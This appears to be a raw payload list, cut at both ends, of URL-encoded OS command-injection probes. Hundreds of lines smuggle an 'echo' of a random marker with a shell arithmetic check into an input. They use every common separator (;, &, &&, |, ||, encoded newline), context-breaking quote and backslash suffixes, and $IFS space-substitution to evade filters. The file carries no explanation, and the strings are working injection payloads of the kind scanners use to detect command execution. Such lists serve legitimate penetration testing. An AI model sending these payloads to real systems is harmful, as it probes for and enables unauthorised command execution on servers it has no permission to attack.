SMD//\n&&echo%20VRZBVN$((80%2B99))$(echo%20VRZBVN)VRZBVN//\n%0aecho%20TRSCUU$((6%2B83))$(echo%20TRSCUU)TRSCUU//\n%3Becho%20CKMZMV$((11%2B82))$(echo%20CKMZMV)CKMZMV//\n%26echo%20GCKMJW$((96%2B51))$(echo%20GCKMJW)GCKMJW//\n%26%26echo%20PNMDUS$((34%2B98))$(echo%20PNMDUS)PNMDUS//\n%7Cecho%20XUZUDN$((64%2B48))$(echo%20XUZUDN)XUZUDN//\n%7C%7Cecho%20GESUGU$((82%2B60))$(echo%20GESUGU)GESUGU//\necho%20MTWKYX$((89%2B57))$(echo%20MTWKYX)MTWKYX\\\n%20echo%20SBCWOI$((11%2B5))$(echo%20SBCWOI)SBCWOI\\\n;echo%20HLWPGL$((69%2B63))$(echo%20HLWPGL)HLWPGL\\\n&echo%20DQKWMO$((0%2B96))$(echo%20DQKWMO)DQKWMO\\\n|echo%20LWFJZZ$((79%2B26))$(echo%20LWFJZZ)LWFJZZ\\\n||echo%20GIZMTU$((59%2B20))$(echo%20GIZMTU)GIZMTU\\\n&&echo%20DPKVKY$((97%2B15))$(echo%20DPKVKY)DPKVKY\\\n%0aecho%20CQEILX$((20%2B83))$(echo%20CQEILX)CQEILX\\\n%3Becho%20XWLOVV$((27%2B91))$(echo%20XWLOVV)XWLOVV\\\n%26echo%20GAMOJU$((86%2B49))$(echo%20GAMOJU)GAMOJU\\\n%26%26echo%20OCTJGM$((17%2B59))$(echo%20OCTJGM)OCTJGM\\\n%7Cecho%20OXATGO$((9%2B84))$(echo%20OXATGO)OXATGO\\\n%7C%7Cecho%20EUMDZA$((75%2B60))$(echo%20EUMDZA)EUMDZA\\\necho%20NTKKKZ$((98%2B48))$(echo%20NTKKKZ)NTKKKZ&\n%20echo%20ROWYVB$((27%2B55))$(echo%20ROWYVB)ROWYVB&\n;echo%20BSAABA$((22%2B11))$(echo%20BSAABA)BSAABA&\n&echo%20XLLZAF$((16%2B93))$(echo%20XLLZAF)XLLZAF&\n|echo%20DTKVRT$((20%2B98))$(echo%20DTKVRT)DTKVRT&\n||echo%20RJENUY$((95%2B27))$(echo%20RJENUY)RJENUY&\n&&echo%20YLPPIG$((46%2B74))$(echo%20YLPPIG)YLPPIG&\n%0aecho%20RXYLFZ$((20%2B86))$(echo%20RXYLFZ)RXYLFZ&\n%3Becho%20OHFUJG$((48%2B14))$(echo%20OHFUJG)OHFUJG&\n%26echo%20CWOFVZ$((5%2B33))$(echo%20CWOFVZ)CWOFVZ&\n%26%26echo%20XVKSQG$((73%2B31))$(echo%20XVKSQG)XVKSQG&\n%7Cecho%20VSTJXX$((81%2B22))$(echo%20VSTJXX)VSTJXX&\n%7C%7Cecho%20VUVMFJ$((74%2B32))$(echo%20VUVMFJ)VUVMFJ&\necho%20EJWKAI$((82%2B9))$(echo%20EJWKAI)EJWKAI|\n%20echo%20HVFWAN$((72%2B27))$(echo%20HVFWAN)HVFWAN|\n;echo%20ZIRSUJ$((79%2B94))$(echo%20ZIRSUJ)ZIRSUJ|\n&echo%20RCNYOU$((2%2B11))$(echo%20RCNYOU)RCNYOU|\n|echo%20HHGNAV$((39%2B89))$(echo%20HHGNAV)HHGNAV|\n||echo%20DNDMGP$((12%2B45))$(echo%20DNDMGP)DNDMGP|\n&&echo%20HGBXKT$((12%2B65))$(echo%20HGBXKT)HGBXKT|\n%0aecho%20TFYSCR$((64%2B58))$(echo%20TFYSCR)TFYSCR|\n%3Becho%20LSPXCM$((79%2B79))$(echo%20LSPXCM)LSPXCM|\n%26echo%20TITLCP$((35%2B27))$(echo%20TITLCP)TITLCP|\n%26%26echo%20OUHWFL$((62%2B61))$(echo%20OUHWFL)OUHWFL|\n%7Cecho%20ACPWWS$((49%2B8))$(echo%20ACPWWS)ACPWWS|\n%7C%7Cecho%20MVZOUV$((29%2B33))$(echo%20MVZOUV)MVZOUV|\necho%20SLHLJI$((31%2B31))$(echo%20SLHLJI)SLHLJI%27\n%20echo%20CBLVPB$((13%2B39))$(echo%20CBLVPB)CBLVPB%27\n;echo%20DIKSWB$((93%2B23))$(echo%20DIKSWB)DIKSWB%27\n&echo%20EIEDPG$((1%2B95))$(echo%20EIEDPG)EIEDPG%27\n|echo%20SSHUWU$((85%2B62))$(echo%20SSHUWU)SSHUWU%27\n||echo%20HEYZBA$((8%2B23))$(echo%20HEYZBA)HEYZBA%27\n&&echo%20FEYLRM$((81%2B59))$(echo%20FEYLRM)FEYLRM%27\n%0aecho%20DINDDL$((2%2B20))$(echo%20DINDDL)DINDDL%27\n%3Becho%20CLWYAX$((98%2B78))$(echo%20CLWYAX)CLWYAX%27\n%26echo%20UMBLZI$((32%2B33))$(echo%20UMBLZI)UMBLZI%27\n%26%26echo%20HOPIIN$((13%2B15))$(echo%20HOPIIN)HOPIIN%27\n%7Cecho%20DSGRDB$((86%2B22))$(echo%20DSGRDB)DSGRDB%27\n%7C%7Cecho%20WQVXFQ$((11%2B54))$(echo%20WQVXFQ)WQVXFQ%27\necho%20LTOENX$((42%2B36))$(echo%20LTOENX)LTOENX%22\n%20echo%20VKXTTD$((59%2B83))$(echo%20VKXTTD)VKXTTD%22\n;echo%20IBYDJK$((27%2B85))$(echo%20IBYDJK)IBYDJK%22\n&echo%20VLOVLO$((85%2B23))$(echo%20VLOVLO)VLOVLO%22\n|echo%20YARTFJ$((41%2B57))$(echo%20YARTFJ)YARTFJ%22\n||echo%20EPBKKE$((59%2B69))$(echo%20EPBKKE)EPBKKE%22\n&&echo%20VEBSDL$((18%2B99))$(echo%20VEBSDL)VEBSDL%22\n%0aecho%20OPVAFF$((48%2B62))$(echo%20OPVAFF)OPVAFF%22\n%3Becho%20FMKLWP$((66%2B12))$(echo%20FMKLWP)FMKLWP%22\n%26echo%20YCWTLN$((43%2B74))$(echo%20YCWTLN)YCWTLN%22\n%26%26echo%20YKZSCO$((10%2B70))$(echo%20YKZSCO)YKZSCO%22\n%7Cecho%20KMHHPF$((93%2B77))$(echo%20KMHHPF)KMHHPF%22\n%7C%7Cecho%20SRPIFR$((51%2B42))$(echo%20SRPIFR)SRPIFR%22\necho%20PXZDJA$((86%2B79))$(echo%20PXZDJA)PXZDJA%5C%5C\n%20echo%20THCQQN$((0%2B88))$(echo%20THCQQN)THCQQN%5C%5C\n;echo%20OSGFBJ$((4%2B40))$(echo%20OSGFBJ)OSGFBJ%5C%5C\n&echo%20OSUMBG$((2%2B75))$(echo%20OSUMBG)OSUMBG%5C%5C\n|echo%20QVGNVW$((11%2B26))$(echo%20QVGNVW)QVGNVW%5C%5C\n||echo%20PNTMBC$((8%2B17))$(echo%20PNTMBC)PNTMBC%5C%5C\n&&echo%20SGBEKO$((44%2B10))$(echo%20SGBEKO)SGBEKO%5C%5C\n%0aecho%20FUZHOM$((22%2B69))$(echo%20FUZHOM)FUZHOM%5C%5C\n%3Becho%20FXYIAP$((22%2B40))$(echo%20FXYIAP)FXYIAP%5C%5C\n%26echo%20FEBSKN$((28%2B4))$(echo%20FEBSKN)FEBSKN%5C%5C\n%26%26echo%20YAIFIN$((82%2B83))$(echo%20YAIFIN)YAIFIN%5C%5C\n%7Cecho%20HSVDWC$((31%2B24))$(echo%20HSVDWC)HSVDWC%5C%5C\n%7C%7Cecho%20HXJEXE$((93%2B89))$(echo%20HXJEXE)HXJEXE%5C%5C\necho%20CDGATY$((12%2B29))$(echo%20CDGATY)CDGATY%2F%2F\n%20echo%20XHVOFZ$((83%2B80))$(echo%20XHVOFZ)XHVOFZ%2F%2F\n;echo%20XSFSQB$((48%2B74))$(echo%20XSFSQB)XSFSQB%2F%2F\n&echo%20CXWXBB$((97%2B33))$(echo%20CXWXBB)CXWXBB%2F%2F\n|echo%20YSISTZ$((83%2B82))$(echo%20YSISTZ)YSISTZ%2F%2F\n||echo%20OSDDFQ$((3%2B39))$(echo%20OSDDFQ)OSDDFQ%2F%2F\n&&echo%20RPUZNC$((77%2B38))$(echo%20RPUZNC)RPUZNC%2F%2F\n%0aecho%20THLXXR$((89%2B18))$(echo%20THLXXR)THLXXR%2F%2F\n%3Becho%20DXYJDU$((98%2B7))$(echo%20DXYJDU)DXYJDU%2F%2F\n%26echo%20XOVEHW$((64%2B7))$(echo%20XOVEHW)XOVEHW%2F%2F\n%26%26echo%20NSDCQT$((87%2B20))$(echo%20NSDCQT)NSDCQT%2F%2F\n%7Cecho%20LZYGCY$((26%2B70))$(echo%20LZYGCY)LZYGCY%2F%2F\n%7C%7Cecho%20OUUQGP$((77%2B65))$(echo%20OUUQGP)OUUQGP%2F%2F\necho%20BKRXCQ$((95%2B40))$(echo%20BKRXCQ)BKRXCQ%26\n%20echo%20QKJRMZ$((93%2B3))$(echo%20QKJRMZ)QKJRMZ%26\n;echo%20ZQUXYY$((11%2B19))$(echo%20ZQUXYY)ZQUXYY%26\n&echo%20HATTRN$((28%2B69))$(echo%20HATTRN)HATTRN%26\n|echo%20ISAUQR$((2%2B13))$(echo%20ISAUQR)ISAUQR%26\n||echo%20UOPEHO$((55%2B30))$(echo%20UOPEHO)UOPEHO%26\n&&echo%20VGPHAP$((62%2B79))$(echo%20VGPHAP)VGPHAP%26\n%0aecho%20KWAWXC$((47%2B31))$(echo%20KWAWXC)KWAWXC%26\n%3Becho%20DNATLQ$((29%2B55))$(echo%20DNATLQ)DNATLQ%26\n%26echo%20GICKYF$((34%2B87))$(echo%20GICKYF)GICKYF%26\n%26%26echo%20ZEPMBC$((82%2B3))$(echo%20ZEPMBC)ZEPMBC%26\n%7Cecho%20QDGJFF$((4%2B21))$(echo%20QDGJFF)QDGJFF%26\n%7C%7Cecho%20QCTOMN$((80%2B24))$(echo%20QCTOMN)QCTOMN%26\necho%20GXOGIA$((9%2B37))$(echo%20GXOGIA)GXOGIA%7C\n%20echo%20OQZVWP$((28%2B27))$(echo%20OQZVWP)OQZVWP%7C\n;echo%20TFWHBO$((48%2B78))$(echo%20TFWHBO)TFWHBO%7C\n&echo%20TEOUXN$((44%2B11))$(echo%20TEOUXN)TEOUXN%7C\n|echo%20SVSMOA$((21%2B73))$(echo%20SVSMOA)SVSMOA%7C\n||echo%20TVGLAW$((25%2B16))$(echo%20TVGLAW)TVGLAW%7C\n&&echo%20YJBIEJ$((20%2B48))$(echo%20YJBIEJ)YJBIEJ%7C\n%0aecho%20VXXNDX$((4%2B53))$(echo%20VXXNDX)VXXNDX%7C\n%3Becho%20OVSKJI$((16%2B53))$(echo%20OVSKJI)OVSKJI%7C\n%26echo%20QWOBER$((53%2B15))$(echo%20QWOBER)QWOBER%7C\n%26%26echo%20MVFPXA$((61%2B74))$(echo%20MVFPXA)MVFPXA%7C\n%7Cecho%20JQVRWN$((97%2B95))$(echo%20JQVRWN)JQVRWN%7C\n%7C%7Cecho%20FGCEYJ$((57%2B45))$(echo%20FGCEYJ)FGCEYJ%7C\n%26echo%20LQDBIP$((97%2B15))$(echo%20LQDBIP)LQDBIP\n%26%20echo%20QJINVP$((61%2B57))$(echo%20QJINVP)QJINVP\n;echo%20OXGNMX$((41%2B15))$(echo%20OXGNMX)OXGNMX\n&echo%20JDWSVZ$((58%2B52))$(echo%20JDWSVZ)JDWSVZ\n|echo%20PVFIQF$((0%2B23))$(echo%20PVFIQF)PVFIQF\n||echo%20KBFRKR$((35%2B98))$(echo%20KBFRKR)KBFRKR\n&&echo%20WFUVSV$((8%2B81))$(echo%20WFUVSV)WFUVSV\n%0aecho%20KYCGWH$((95%2B3))$(echo%20KYCGWH)KYCGWH\n%3Becho%20OOBLUU$((57%2B95))$(echo%20OOBLUU)OOBLUU\n%26echo%20AAKQAO$((78%2B60))$(echo%20AAKQAO)AAKQAO\n%26%26echo%20KSNQJR$((81%2B61))$(echo%20KSNQJR)KSNQJR\n%7Cecho%20TDQPPJ$((73%2B90))$(echo%20TDQPPJ)TDQPPJ\n%7C%7Cecho%20CHJQTG$((39%2B34))$(echo%20CHJQTG)CHJQTG\necho%20NXONQU$((86%2B15))$(echo%20NXONQU)NXONQU'\n%20echo%20MGXQDS$((94%2B23))$(echo%20MGXQDS)MGXQDS'\n;echo%20STJJEN$((67%2B8))$(echo%20STJJEN)STJJEN'\n&echo%20RCBRLG$((15%2B16))$(echo%20RCBRLG)RCBRLG'\n|echo%20JQKYOJ$((43%2B35))$(echo%20JQKYOJ)JQKYOJ'\n||echo%20VYZGPJ$((27%2B25))$(echo%20VYZGPJ)VYZGPJ'\n&&echo%20QVCFLS$((84%2B30))$(echo%20QVCFLS)QVCFLS'\n%0aecho%20TXQFBT$((39%2B43))$(echo%20TXQFBT)TXQFBT'\n%3Becho%20YGSTDU$((3%2B28))$(echo%20YGSTDU)YGSTDU'\n%26echo%20QFACMV$((19%2B23))$(echo%20QFACMV)QFACMV'\n%26%26echo%20TWFPKP$((59%2B90))$(echo%20TWFPKP)TWFPKP'\n%7Cecho%20EBRXMB$((11%2B49))$(echo%20EBRXMB)EBRXMB'\n%7C%7Cecho%20VIYVBR$((79%2B51))$(echo%20VIYVBR)VIYVBR'\necho%20BRRGHV$((59%2B39))$(echo%20BRRGHV)BRRGHV\"\n%20echo%20DRLNDB$((45%2B12))$(echo%20DRLNDB)DRLNDB\"\n;echo%20BOSXTS$((61%2B2))$(echo%20BOSXTS)BOSXTS\"\n&echo%20TIIEEY$((36%2B32))$(echo%20TIIEEY)TIIEEY\"\n|echo%20QQBCQL$((54%2B23))$(echo%20QQBCQL)QQBCQL\"\n||echo%20EGVZBX$((88%2B98))$(echo%20EGVZBX)EGVZBX\"\n&&echo%20KPFBCT$((17%2B12))$(echo%20KPFBCT)KPFBCT\"\n%0aecho%20BLZAZS$((67%2B95))$(echo%20BLZAZS)BLZAZS\"\n%3Becho%20CWGSJV$((66%2B67))$(echo%20CWGSJV)CWGSJV\"\n%26echo%20EGLUMP$((59%2B73))$(echo%20EGLUMP)EGLUMP\"\n%26%26echo%20NDMYPS$((48%2B41))$(echo%20NDMYPS)NDMYPS\"\n%7Cecho%20VHYHSQ$((46%2B81))$(echo%20VHYHSQ)VHYHSQ\"\n%7C%7Cecho%20GLTVHA$((47%2B68))$(echo%20GLTVHA)GLTVHA\"\necho%20OUEOUN$((36%2B63))$(echo%20OUEOUN)OUEOUN\n%20echo%20YPGHYO$((29%2B85))$(echo%20YPGHYO)YPGHYO\n;echo%20UKKXOY$((15%2B70))$(echo%20UKKXOY)UKKXOY\n&echo%20TDKYEQ$((93%2B40))$(echo%20TDKYEQ)TDKYEQ\n|echo%20DHCFMD$((19%2B7))$(echo%20DHCFMD)DHCFMD\n||echo%20QLNCNS$((54%2B0))$(echo%20QLNCNS)QLNCNS\n&&echo%20HJTQXE$((5%2B51))$(echo%20HJTQXE)HJTQXE\n%0aecho%20UFXVBT$((19%2B18))$(echo%20UFXVBT)UFXVBT\n%3Becho%20SKJOIJ$((68%2B83))$(echo%20SKJOIJ)SKJOIJ\n%26echo%20PSQPBU$((10%2B52))$(echo%20PSQPBU)PSQPBU\n%26%26echo%20YQCCXV$((3%2B76))$(echo%20YQCCXV)YQCCXV\n%7Cecho%20UQHUGC$((5%2B71))$(echo%20UQHUGC)UQHUGC\n%7C%7Cecho%20FKMVVE$((10%2B58))$(echo%20FKMVVE)FKMVVE\necho%20RSCBOB$((85%2B25))$(echo%20RSCBOB)RSCBOB//\n%20echo%20PJVHQL$((20%2B65))$(echo%20PJVHQL)PJVHQL//\n;echo%20FTUKUF$((89%2B93))$(echo%20FTUKUF)FTUKUF//\n&echo%20XYNJUX$((85%2B41))$(echo%20XYNJUX)XYNJUX//\n|echo%20HODOEM$((87%2B81))$(echo%20HODOEM)HODOEM//\n||echo%20AYKDNR$((62%2B16))$(echo%20AYKDNR)AYKDNR//\n&&echo%20BDNTCM$((25%2B80))$(echo%20BDNTCM)BDNTCM//\n%0aecho%20GOYPAH$((75%2B21))$(echo%20GOYPAH)GOYPAH//\n%3Becho%20MHISGE$((85%2B13))$(echo%20MHISGE)MHISGE//\n%26echo%20JCPTZR$((19%2B12))$(echo%20JCPTZR)JCPTZR//\n%26%26echo%20ZHQBQS$((72%2B22))$(echo%20ZHQBQS)ZHQBQS//\n%7Cecho%20DRBQLH$((57%2B13))$(echo%20DRBQLH)DRBQLH//\n%7C%7Cecho%20GGJYSE$((67%2B63))$(echo%20GGJYSE)GGJYSE//\necho%20HVYPWJ$((15%2B1))$(echo%20HVYPWJ)HVYPWJ\\\n%20echo%20NCMPJP$((69%2B98))$(echo%20NCMPJP)NCMPJP\\\n;echo%20EKHLZG$((64%2B29))$(echo%20EKHLZG)EKHLZG\\\n&echo%20JYGQCN$((44%2B48))$(echo%20JYGQCN)JYGQCN\\\n|echo%20SUVOTB$((44%2B30))$(echo%20SUVOTB)SUVOTB\\\n||echo%20KPNBST$((18%2B29))$(echo%20KPNBST)KPNBST\\\n&&echo%20RBCZEH$((34%2B18))$(echo%20RBCZEH)RBCZEH\\\n%0aecho%20SJTIHB$((1%2B37))$(echo%20SJTIHB)SJTIHB\\\n%3Becho%20RXPYLT$((92%2B26))$(echo%20RXPYLT)RXPYLT\\\n%26echo%20UQBVZS$((49%2B88))$(echo%20UQBVZS)UQBVZS\\\n%26%26echo%20SJDKJV$((54%2B71))$(echo%20SJDKJV)SJDKJV\\\n%7Cecho%20PHLZMC$((98%2B93))$(echo%20PHLZMC)PHLZMC\\\n%7C%7Cecho%20OXPIUV$((55%2B69))$(echo%20OXPIUV)OXPIUV\\\necho%20LBGSCB$((75%2B53))$(echo%20LBGSCB)LBGSCB&\n%20echo%20VAAVBM$((40%2B49))$(echo%20VAAVBM)VAAVBM&\n;echo%20UWAPJX$((78%2B84))$(echo%20UWAPJX)UWAPJX&\n&echo%20QSELIT$((42%2B46))$(echo%20QSELIT)QSELIT&\n|echo%20GBNBXF$((98%2B4))$(echo%20GBNBXF)GBNBXF&\n||echo%20KKWMUH$((89%2B92))$(echo%20KKWMUH)KKWMUH&\n&&echo%20CNCBLT$((66%2B98))$(echo%20CNCBLT)CNCBLT&\n%0aecho%20WOLMWS$((65%2B25))$(echo%20WOLMWS)WOLMWS&\n%3Becho%20ZUILRB$((40%2B52))$(echo%20ZUILRB)ZUILRB&\n%26echo%20TBCUEY$((8%2B42))$(echo%20TBCUEY)TBCUEY&\n%26%26echo%20BMKZQV$((89%2B7))$(echo%20BMKZQV)BMKZQV&\n%7Cecho%20RWGJZW$((36%2B73))$(echo%20RWGJZW)RWGJZW&\n%7C%7Cecho%20KXJBTF$((63%2B25))$(echo%20KXJBTF)KXJBTF&\necho%20NRIFAB$((13%2B88))$(echo%20NRIFAB)NRIFAB|\n%20echo%20IOJYKG$((10%2B79))$(echo%20IOJYKG)IOJYKG|\n;echo%20KOAUAW$((33%2B36))$(echo%20KOAUAW)KOAUAW|\n&echo%20WRYKIU$((34%2B68))$(echo%20WRYKIU)WRYKIU|\n|echo%20KDOBDY$((28%2B82))$(echo%20KDOBDY)KDOBDY|\n||echo%20LZGCEO$((29%2B11))$(echo%20LZGCEO)LZGCEO|\n&&echo%20EOLZZI$((76%2B39))$(echo%20EOLZZI)EOLZZI|\n%0aecho%20QLRSUP$((61%2B80))$(echo%20QLRSUP)QLRSUP|\n%3Becho%20YGFETC$((86%2B48))$(echo%20YGFETC)YGFETC|\n%26echo%20VLCTNG$((82%2B89))$(echo%20VLCTNG)VLCTNG|\n%26%26echo%20TETKKY$((84%2B73))$(echo%20TETKKY)TETKKY|\n%7Cecho%20RQGHQR$((90%2B57))$(echo%20RQGHQR)RQGHQR|\n%7C%7Cecho%20CYXVMU$((24%2B36))$(echo%20CYXVMU)CYXVMU|\necho%20QFCALQ$((19%2B0))$(echo%20QFCALQ)QFCALQ%27\n%20echo%20VMEFKZ$((26%2B36))$(echo%20VMEFKZ)VMEFKZ%27\n;echo%20JBPPQK$((55%2B35))$(echo%20JBPPQK)JBPPQK%27\n&echo%20AUJZVK$((4%2B31))$(echo%20AUJZVK)AUJZVK%27\n|echo%20OBEPVB$((99%2B41))$(echo%20OBEPVB)OBEPVB%27\n||echo%20FCIAEL$((12%2B72))$(echo%20FCIAEL)FCIAEL%27\n&&echo%20HECZHW$((41%2B77))$(echo%20HECZHW)HECZHW%27\n%0aecho%20QUYIRT$((99%2B30))$(echo%20QUYIRT)QUYIRT%27\n%3Becho%20OKHPYH$((66%2B11))$(echo%20OKHPYH)OKHPYH%27\n%26echo%20SGEJFS$((3%2B63))$(echo%20SGEJFS)SGEJFS%27\n%26%26echo%20SLSODI$((22%2B77))$(echo%20SLSODI)SLSODI%27\n%7Cecho%20JZRWVD$((83%2B63))$(echo%20JZRWVD)JZRWVD%27\n%7C%7Cecho%20CKNPSQ$((65%2B36))$(echo%20CKNPSQ)CKNPSQ%27\necho%20IXGIJZ$((51%2B13))$(echo%20IXGIJZ)IXGIJZ%22\n%20echo%20DWODRY$((85%2B90))$(echo%20DWODRY)DWODRY%22\n;echo%20YUCTUM$((64%2B59))$(echo%20YUCTUM)YUCTUM%22\n&echo%20GZHQMB$((76%2B23))$(echo%20GZHQMB)GZHQMB%22\n|echo%20MAVZWG$((0%2B81))$(echo%20MAVZWG)MAVZWG%22\n||echo%20YJAQPI$((25%2B18))$(echo%20YJAQPI)YJAQPI%22\n&&echo%20EVVYXO$((98%2B26))$(echo%20EVVYXO)EVVYXO%22\n%0aecho%20YKMXVM$((97%2B0))$(echo%20YKMXVM)YKMXVM%22\n%3Becho%20JSDBIM$((99%2B35))$(echo%20JSDBIM)JSDBIM%22\n%26echo%20TIRPSP$((59%2B67))$(echo%20TIRPSP)TIRPSP%22\n%26%26echo%20PZSPFJ$((63%2B85))$(echo%20PZSPFJ)PZSPFJ%22\n%7Cecho%20IWVQXP$((56%2B14))$(echo%20IWVQXP)IWVQXP%22\n%7C%7Cecho%20SEOPIT$((30%2B65))$(echo%20SEOPIT)SEOPIT%22\necho%20NXXMYC$((83%2B4))$(echo%20NXXMYC)NXXMYC%5C%5C\n%20echo%20UWIANE$((47%2B69))$(echo%20UWIANE)UWIANE%5C%5C\n;echo%20VPNQXQ$((3%2B65))$(echo%20VPNQXQ)VPNQXQ%5C%5C\n&echo%20UPPHYJ$((1%2B62))$(echo%20UPPHYJ)UPPHYJ%5C%5C\n|echo%20KCPSNB$((82%2B19))$(echo%20KCPSNB)KCPSNB%5C%5C\n||echo%20BDZWWB$((16%2B92))$(echo%20BDZWWB)BDZWWB%5C%5C\n&&echo%20CYENPU$((54%2B11))$(echo%20CYENPU)CYENPU%5C%5C\n%0aecho%20LKGEJU$((76%2B63))$(echo%20LKGEJU)LKGEJU%5C%5C\n%3Becho%20SBGUSE$((30%2B27))$(echo%20SBGUSE)SBGUSE%5C%5C\n%26echo%20CRIQOG$((34%2B52))$(echo%20CRIQOG)CRIQOG%5C%5C\n%26%26echo%20BAHZUB$((39%2B52))$(echo%20BAHZUB)BAHZUB%5C%5C\n%7Cecho%20DONSLV$((7%2B31))$(echo%20DONSLV)DONSLV%5C%5C\n%7C%7Cecho%20XLRSQY$((12%2B78))$(echo%20XLRSQY)XLRSQY%5C%5C\necho%20KOGUZU$((35%2B4))$(echo%20KOGUZU)KOGUZU%2F%2F\n%20echo%20ZUHEPR$((0%2B30))$(echo%20ZUHEPR)ZUHEPR%2F%2F\n;echo%20FGXIGR$((59%2B62))$(echo%20FGXIGR)FGXIGR%2F%2F\n&echo%20BVLJXS$((57%2B50))$(echo%20BVLJXS)BVLJXS%2F%2F\n|echo%20YJGAOX$((31%2B49))$(echo%20YJGAOX)YJGAOX%2F%2F\n||echo%20YLLPSR$((30%2B99))$(echo%20YLLPSR)YLLPSR%2F%2F\n&&echo%20LZKRLE$((89%2B61))$(echo%20LZKRLE)LZKRLE%2F%2F\n%0aecho%20LBEVAD$((90%2B55))$(echo%20LBEVAD)LBEVAD%2F%2F\n%3Becho%20AXSYWN$((98%2B71))$(echo%20AXSYWN)AXSYWN%2F%2F\n%26echo%20JVRRJE$((66%2B84))$(echo%20JVRRJE)JVRRJE%2F%2F\n%26%26echo%20QOVHPK$((74%2B92))$(echo%20QOVHPK)QOVHPK%2F%2F\n%7Cecho%20JQHGOG$((52%2B28))$(echo%20JQHGOG)JQHGOG%2F%2F\n%7C%7Cecho%20ERPAKK$((2%2B34))$(echo%20ERPAKK)ERPAKK%2F%2F\necho%20EPELRS$((18%2B25))$(echo%20EPELRS)EPELRS%26\n%20echo%20GAZVPT$((45%2B89))$(echo%20GAZVPT)GAZVPT%26\n;echo%20SXXKOK$((57%2B8))$(echo%20SXXKOK)SXXKOK%26\n&echo%20DPZXBY$((14%2B0))$(echo%20DPZXBY)DPZXBY%26\n|echo%20LAPJLQ$((95%2B69))$(echo%20LAPJLQ)LAPJLQ%26\n||echo%20RZQOUE$((1%2B0))$(echo%20RZQOUE)RZQOUE%26\n&&echo%20DBWTGZ$((49%2B92))$(echo%20DBWTGZ)DBWTGZ%26\n%0aecho%20EMMLEG$((69%2B45))$(echo%20EMMLEG)EMMLEG%26\n%3Becho%20WQAPQR$((68%2B99))$(echo%20WQAPQR)WQAPQR%26\n%26echo%20KNTCFP$((68%2B73))$(echo%20KNTCFP)KNTCFP%26\n%26%26echo%20JCHUJJ$((46%2B0))$(echo%20JCHUJJ)JCHUJJ%26\n%7Cecho%20YHQVRJ$((39%2B41))$(echo%20YHQVRJ)YHQVRJ%26\n%7C%7Cecho%20WBGPIV$((75%2B82))$(echo%20WBGPIV)WBGPIV%26\necho%20URWAUA$((68%2B21))$(echo%20URWAUA)URWAUA%7C\n%20echo%20QCALON$((95%2B41))$(echo%20QCALON)QCALON%7C\n;echo%20XJGFPU$((17%2B93))$(echo%20XJGFPU)XJGFPU%7C\n&echo%20JNSOXA$((61%2B86))$(echo%20JNSOXA)JNSOXA%7C\n|echo%20IVIYPT$((61%2B1))$(echo%20IVIYPT)IVIYPT%7C\n||echo%20KTAZQG$((85%2B41))$(echo%20KTAZQG)KTAZQG%7C\n&&echo%20XTYKFU$((13%2B92))$(echo%20XTYKFU)XTYKFU%7C\n%0aecho%20BPDPMT$((28%2B28))$(echo%20BPDPMT)BPDPMT%7C\n%3Becho%20XJTEZA$((75%2B98))$(echo%20XJTEZA)XJTEZA%7C\n%26echo%20FOXDLA$((60%2B49))$(echo%20FOXDLA)FOXDLA%7C\n%26%26echo%20ONGWOM$((79%2B3))$(echo%20ONGWOM)ONGWOM%7C\n%7Cecho%20VZDOKD$((12%2B24))$(echo%20VZDOKD)VZDOKD%7C\n%7C%7Cecho%20XSXWGV$((71%2B98))$(echo%20XSXWGV)XSXWGV%7C\necho$IFSYOOFMV$((62%2B55))$(echo$IFSYOOFMV)YOOFMV\n%20echo%20HYDGEB$((71%2B9))$(echo%20HYDGEB)HYDGEB\n;echo$IFSCGVCXZ$((66%2B61))$(echo$IFSCGVCXZ)CGVCXZ\n&echo$IFSFFEUVI$((96%2B62))$(echo$IFSFFEUVI)FFEUVI\n|echo$IFSTZERWA$((97%2B63))$(echo$IFSTZERWA)TZERWA\n||echo$IFSECAVFZ$((36%2B1))$(echo$IFSECAVFZ)ECAVFZ\n&&echo$IFSWKUYHB$((71%2B18))$(echo$IFSWKUYHB)WKUYHB\n%0aecho$IFSUEAGEW$((73%2B31))$(echo$IFSUEAGEW)UEAGEW\n%3Becho$IFSKIRJVA$((72%2B54))$(echo$IFSKIRJVA)KIRJVA\n%26echo$IFSEYORRP$((46%2B13))$(echo$IFSEYORRP)EYORRP\n%26%26echo$IFSZMBRNO$((77%2B76))$(echo$IFSZMBRNO)ZMBRNO\n%7Cecho$IFSXCWWGK$((90%2B51))$(echo$IFSXCWWGK)XCWWGK\n%7C%7Cecho$IFSHCECZD$((65%2B26))$(echo$IFSHCECZD)HCECZD\necho$IFSNZFJZC$((22%2B7))$(echo$IFSNZFJZC)NZFJZC'\n%20echo%20FMIZIK$((70%2B3))$(echo%20FMIZIK)FMIZIK'\n;echo$IFSSGAACL$((0%2B12))$(echo$IFSSGAACL)SGAACL'\n&echo$IFSTKZMMA$((70%2B55))$(echo$IFSTKZMMA)TKZMMA'\n|echo$IFSORMIGP$((36%2B81))$(echo$IFSORMIGP)ORMIGP'\n||echo$IFSWTNYEV$((5%2B53))$(echo$IFSWTNYEV)WTNYEV'\n&&echo$IFSUGBSBK$((46%2B64))$(echo$IFSUGBSBK)UGBSBK'\n%0aecho$IFSZOHJGD$((19%2B47))$(echo$IFSZOHJGD)ZOHJGD'\n%3Becho$IFSWFUSQI$((24%2B11))$(echo$IFSWFUSQI)WFUSQI'\n%26echo$IFSJADCHB$((6%2B80))$(echo$IFSJADCHB)JADCHB'\n%26%26echo$IFSDKBFUT$((7%2B8))$(echo$IFSDKBFUT)DKBFUT'\n%7Cecho$IFSMDQUDE$((92%2B96))$(echo$IFSMDQUDE)MDQUDE'\n%7C%7Cecho$IFSJOEJNW$((26%2B59))$(echo$IFSJOEJNW)JOEJNW'\necho$IFSDYARGF$((39%2B79))$(echo$IFSDYARGF)DYARGF\"\n%20echo%20NKOHBN$((96%2B64))$(echo%20NKOHBN)NKOHBN\"\n;echo$IFSQKZBJP$((23%2B59))$(echo$IFSQKZBJP)QKZBJP\"\n&echo$IFSZIGKVR$((87%2B20))$(echo$IFSZIGKVR)ZIGKVR\"\n|echo$IFSDJJNIK$((63%2B58))$(echo$IFSDJJNIK)DJJNIK\"\n||echo$IFSRONZCJ$((41%2B90))$(echo$IFSRONZCJ)RONZCJ\"\n&&echo$IFSPDNJNK$((22%2B74))$(echo$IFSPDNJNK)PDNJNK\"\n%0aecho$IFSBNKFRX$((81%2B19))$(echo$IFSBNKFRX)BNKFRX\"\n%3Becho$IFSRWNIHZ$((72%2B65))$(echo$IFSRWNIHZ)RWNIHZ\"\n%26echo$IFSUXIQZJ$((27%2B95))$(echo$IFSUXI